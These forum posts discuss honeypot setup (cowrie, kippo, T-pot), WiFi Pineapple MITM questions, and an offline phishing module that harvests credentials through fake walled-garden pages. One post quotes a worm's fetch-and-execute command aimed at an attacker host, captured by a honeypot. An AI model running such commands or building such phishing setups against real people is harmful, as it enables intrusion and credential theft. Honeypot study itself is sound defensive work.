Search the Community

hello. everyone: I've used some multifunctional honeypot. for example: beeswarm、T-pot but I think they all have shortcomings. beeswarm needs three machine to make honypot and alert is not accurate. T-pot is download slowly in China, and it is more suitable for deployment on the Internet . now, I need a honeypots depoyment on LAN. Can anyone recommend a best multifunctional honeypot? all help will be appreciated!!!

Today i noticed my network was a little sluggish, so I checked the tcp stream out of habit. I see login attempts on my home router via ssh. So I quickly installed in virtual-box a light version of ubuntu and then I installed a honeypot. I created a user list of root:x:500-worst-passwords for ssh With some iptable kungfu I directed the attack to the honeypot and boom I see command execution while its happening ; -) This is exciting... The attack was coming from hundreds of LoT devices(webcams/routers/house hold applances) When I seen the commands executed, I see wget http:/Attack-ip-address/y808oe chmod +x y808oe ./y808oe So I download a copy of the file for later research in hopes that it might be 0day... One of my thoughts is the list of lot devices used, I too could could gain access to these devices. I believe this is just a LoT device worm automated to get more devices. Any one have experience or fun with honey pots?

Hi, Just looking for some advice on using python pickle to create an authentic looking filesystem for cowrie, has anyone experience of this? I have run the createfs.py script from the cowrie utils folder and created a fake filesystem based on the systems filesystem, however this wont be great as their are a fair few clues that it is a honey pot (the user called cowrie, the cowrie folder etc etc.). Thanks in advance.

Hey guys. I was wondering how to go about setting up a JAVA-BASED honeypot in VMware, using the network architecture below as an example. I 'm specific about the honeypot being java-based because I'd like to be able to generate statistical reports in a java console. If this project has been worked on before, I'd appreciate a re-direct or two, and I'd also like to know your recommendations on the types of operating systems suggested for each of the systems in the network (IDS, client/webserver, honeypot, firewall). Thanks.

Do any of you guys have any experience with kippo ? I'm looking to set up my first honeypot. You know just to see and test out. And i'm wondering if any got some tips / tricks they might want to share. Kind regards, GuardMoony

First I would like to say thank you-to HAK5, the modirator and Chris H for doing a heck of a job to get this project running!! You folks Rock! I have read all the info on the forum and have a few questions about the MITM using SSLSTRIP and/or creating a honeypot. For use in a educational way or for my own personal use I watch Chris's vid on SSLSTRIP. Now Question is, if I am using my home WIFI router as the way for other to connect through, I went to the network tab, and my router requires a password, I noted chris just had a open WIFI, no password required. Do I need to take my password off, so that when I use Karma, others can connect?? I did not see in Chris's vid the use of Karma or how he set it up? Chris, any aid or instruction would be welcomed OR Can I just use network tab, use my password to connect to my router and then use karma to list any new name?? Secondly, Lets say I see a router named XYZ-- Do I need to name my Karma Name XYZ to lure those folks who use that or does it have to be XYZ1??? How does this differ form the honey pot?? Thank you! Dillhole

I am almost finished with v0.1 of my offline phishing module. The premise of this module is simple. You set the ssid of an open wireless network (Free Public Wifi, etc.) When enabled, all requests will be forwarded to a 'walled garden' splash page. This will inform the viewer that they have limited access to only certain pages, and will give links to these pages. Every one of these pages are phishing pages that you can upload to the module (even your own!). Since all phishing pages are hosted locally, this module is intended to work all of the time, without internet access. It gives the user the impression that they are connecting to pages on the internet, yet all credentials are harvested. Another beautiful thing about this module is how little hardware it uses. I have been known to have up to 3 usb wifi cards plugged into my pineapple while using for deauth/wifi repeating etc... This module can be used with only a properly formatted flash drive, eliminating a need for a usb hub (and the extra power it consumes). I need Seb or someone at wifipineapple.com to verify me for module submission. I also would like to talk to Petertfm about this module. I have reused (embarrassingly large amounts of) his code from his RandomRoll module in this. Our modules are extremely similar in both frontend and backend. I would like to ask him a couple of questions/ get him to sign off on the parts of his code I used before making this public. I have tried to message him but he does not accept messages. Petertfm if you read this, please send me a message or an email at my uname [at] gmail.